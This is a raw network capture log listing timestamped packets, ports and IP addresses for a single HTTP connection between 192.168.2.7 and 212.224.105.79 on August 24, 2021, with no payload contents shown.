Aug 24, 2021 08:46:53.245202065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245210886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245223999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245240927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245258093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245274067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245277882 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245291948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245312929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245321989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245331049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245347977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245358944 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245364904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245382071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245392084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245398998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245415926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245424032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245431900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245452881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245471001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245480061 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245487928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245500088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245513916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245522976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245531082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245547056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245557070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245563984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245577097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245593071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245609999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245626926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245635986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245642900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245661020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245662928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245672941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245692015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245709896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245726109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245728016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245743990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245760918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245774031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245778084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245790005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245801926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245816946 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245896101 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.267873049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.267901897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.267918110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.267937899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.267956972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.267976046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.267995119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268009901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268011093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268028021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268044949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268060923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268063068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268074036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268086910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268102884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268104076 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268117905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268137932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268143892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268155098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268170118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268171072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268186092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268202066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268213987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268217087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268233061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268256903 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268261909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268280983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268296003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268311977 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268313885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268330097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268343925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268348932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268367052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268383026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268385887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268399954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268414974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268419027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268426895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268440008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268452883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268465042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268476009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268486977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268502951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268518925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268527985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.268534899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268553972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.268577099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.270669937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.270703077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.270715952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.270733118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.270749092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.270770073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.270792007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.270847082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.290584087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290611029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290627003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290644884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290657043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290668964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290680885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290693998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290707111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.290710926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290724039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290762901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290780067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290796041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290797949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.290808916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290827990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290838003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.290847063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290868044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290884972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290901899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290904999 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.290923119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290935040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290947914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290957928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.290958881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290971041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290982962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.290994883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291006088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291018009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291034937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291049957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291052103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.291062117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291079998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291091919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291101933 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.291104078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291132927 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.291136026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291152954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.291157007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291173935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291189909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.291191101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291207075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291207075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.291219950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291239977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.291248083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.291290045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.292834044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.292854071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.292866945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.292879105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.292953014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.292988062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314126968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314186096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314229965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314275026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314290047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314320087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314341068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314352989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314361095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314383984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314403057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314407110 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314424992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314445972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314470053 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314471006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314493895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314493895 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314517021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314523935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314539909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314562082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314589024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314591885 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314613104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314635992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314636946 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314657927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314666986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314681053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314707041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314707994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314733982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314752102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314757109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314780951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314804077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314811945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314827919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314851999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314855099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314874887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314898014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314898968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314924002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314948082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314950943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314970970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.314995050 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.314995050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315020084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315042973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.315042973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315068007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315088987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.315090895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315135002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315155983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.315164089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315187931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315212011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.315223932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315249920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315267086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.315274000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315295935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315318108 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.315320015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315344095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315366030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.315370083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.315412045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.337455988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337496996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337526083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337548971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337569952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337591887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337614059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337637901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337652922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.337661028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337685108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337712049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337732077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.337734938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337759972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337771893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.337786913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337796926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.337809086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337831974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337841988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.337855101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337879896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337886095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.337905884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337932110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337943077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.337954998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337980986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.337985992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338002920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338026047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338041067 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338048935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338073969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338088989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338099957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338123083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338134050 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338145971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338170052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338177919 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338193893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338217974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338217974 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338241100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338264942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338264942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338293076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338315010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338316917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338340044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338357925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338363886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338386059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338407040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338408947 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338430882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338454008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338457108 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338479042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338500977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338522911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338543892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338546991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338567019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338588953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.338591099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.338654041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.345127106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.360672951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360714912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360738993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360761881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360774040 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.360785961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360801935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.360810041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360832930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360855103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360857010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.360874891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360901117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360924006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.360924959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360949039 CEST	80	49715	212.224.105.79	192.168.2.7
